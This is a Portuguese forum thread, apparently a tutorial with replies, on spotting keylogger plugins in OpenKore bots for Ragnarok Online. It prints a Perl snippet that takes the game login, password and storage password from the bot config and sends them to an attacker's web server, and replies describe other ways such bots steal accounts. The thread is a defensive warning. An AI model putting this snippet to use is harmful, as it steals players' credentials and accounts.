[Tutorial]Como identificar bot com keylogger

[''YukiTeru'' 0]

Introdução

 

Meu objetivo com este tutorial é de alertar muitos usuários ( especialmente os leigos) que baixam bots e desconhecem a fonte de origem do mesmo, e assim tendo suas contas roubadas. Apresentarei algumas medidas para que não tenham suas contas furtadas, estarei usando uma linguagem bem simples para que todos possam compreender. E por favor, se já sabe como identificar keyloggers e outras ameaças, não torre minha paciência escrevendo babaquices, como: "Ahh todo mundo já sabia disso!", "Isso é o básico do básico", e etc.

 

 

Como detectar um keylogger "indetectável", já se tratando de bots?

Os keyloggers usados em bots são dividos muitas vezes em 3 partes, sendo elas:

 

1. Plugin em .pl que vem com o bot.

2. Arquivo .php que fica localizado no site do "hacker/cracker ( na verdade é lammer )".

3. Arquivo .txt que fica também no site do atacante.

 

Tudo isso funciona da seguinte maneira:

Ao rodar o bot, o plugin com código malicioso é executado, ele pega suas informações como: Login, senha e senha de armazém, salva em algumas variáveis e envia para o site do atacante.

O arquivo .php escreve todas essas informações no .txt, e assim o atacante pega suas informações.

 

Para detectar esse código malicioso em .pl ( perls ), vá na pasta de seu openkore e em seguida entre na pasta plugins, lá como já sabem, estão seus plugins.

Abra um por um, aperte CTRL+F e procure por este código:

 

Arquivo.pl

 

 

 

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

$senha $kafra")

 

 

Se por acaso encontrar este código, significa que o bot tem "keylogger", e certamente se executa-lo todas as suas informações serão enviadas para o site do atacante. Para remover o keylogger, apenas apague essas linhas.

[saruesley *-* 33]

Sinto lhe informar mais ja existe um topico deste aqui no forum!

 

http://www.webcheats.com.br/forum/rag-tutoriais/1292012-tutorial-como-detectar-keyloggers-no-openkore.html

[Simpson~* 24]

boa iniciativa, e já que o meu topico foi fexado... esse vai ser bem util ate pq o meu ja tá nos confins do fórum.

só que vc so explicou o metodo de um hacher (o araujorag)

os dois outros metodos mais comuns sao:

1- o de enviar pm pra um player no jogo com a sua acc e senha (normalmente eles deshabilitam automaticamente a opçao "exibir pm na tela")

2- o de modificat o arquivo pl atraves da linguagem dephil para implantar o kl lá.

 

o primeiro eu so vi 3 vezes e nao consegui relacionar a nenhum hacer conhecido aqui do forum, mas o segundo é normalmente usado pelo programador10

 

o primeiro é um plugin com o comando de deshabolitar o pm, o de enviar o pm e com as variaveis "username" e "password" (é tudo o que eu sei)

o segundo tem um video no youtube que encina a identificar, mas eu nao sei nada sobre isso.

 

@edit--------------------------

coloque uns erros de sintaxe nesse exemplo de kl para que ninguem copie, se nao vao chegar uns 500 bots aqui todos com o mesmo kl so modificando a parte que diz pra onde enviar as contas....

[''YukiTeru'' 0]

O Principal de eu estar fazendo esse topico é por causa que fui hackiado a 3 meses atras por esse motivo , eu não via se o bot tinha keylogger o importante era upar meu personagem e um belo dia quando eu tava lv 130 eu comprei zeny comprei 40kk .entraram na minha acc e me robaraam...Bom mano quanto aos outros metodos.vc poderia postar pra não só eu mas varios membros que foram hackiados pegarem já a mania de não confiar em bots...estarei agradecido se vc postar então talvez eu poste um bot que achei akie na net . só vou ver se ta com key irei te passar o link:

É necessário se cadastrar para acessar o conteúdo.

• Entre
• ou
• Cadastre-se

Estou passando o video que tem o link de download na descrição por causa que na wc está Proibido postar bots...Qualquer hm por motivos que vcs ja sabem KEYLogger entao pessoal tomem mt cuidado sugiro baixar bots na brocenter mesmo.

 

ainda não sou expert em ver se ta com keylogger ... esse bot ai achei hj no youtube o cara falo que tava atualizado... 04/04/12 irei ver se tem keylogger então peço sua ajuda.como eu disse não sou expert em verificar bots com keylogger e tbm só sei o metodo do araujo,Obg.